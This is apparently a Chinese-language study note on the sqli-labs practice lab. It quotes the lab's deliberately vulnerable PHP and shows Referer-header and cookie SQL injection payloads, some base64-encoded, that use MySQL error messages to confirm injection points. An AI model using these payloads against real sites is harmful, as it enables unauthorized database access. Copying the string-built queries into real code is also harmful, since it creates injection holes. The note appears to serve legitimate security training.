sqli labs 4

题目19中的注入是header 头注入，要想注入的前提是知道用户名，密码
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your Referer is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";

}
所以注入在： Referer
构造referer： aa','') # 页面正常显示
构造referer：aa' 页面报错，因此这里存在注入

利用：Referer:' or 1=(select count(*) from usersw) ,'')#
报错：Table 'security.usersw' doesn't exist

读源码： 设置cookie： a'
post数据：uname=afda&passwd=d 后面没有submit

提交后报错：Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aa'''''' LIMIT 0,1' at line 1

ok，注入找见了，是cookie注入，利用
cookie: uname=aa' and (select count(*) from aa) >0 #
报错：Issue with your mysql: Table 'security.aa' doesn't exist

直接上源码分析：
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

$cookee = base64_decode($cookee);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);

post 数据：
uname=admin1ds&passwd=fda
cookie中的uname base64 加密
设置cookie：uname=' 加密后：cookie: uname=Jw==
提交页面报错：Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1

设置cookie: uname=') and (select count(*) from user)>0 #
加密后： cookie： uname=JykgYW5kIChzZWxlY3QgY291bnQoKikgZnJvbSB1c2VyKT4wICM=
返回错误：Issue with your mysql: Table 'security.user' doesn't exist

ok，注入找见了

直接上源代码：
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row)
{
post 数据：
uname=admin1ds&passwd=fda
cookie中的uname base64 加密
sql语句是：SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1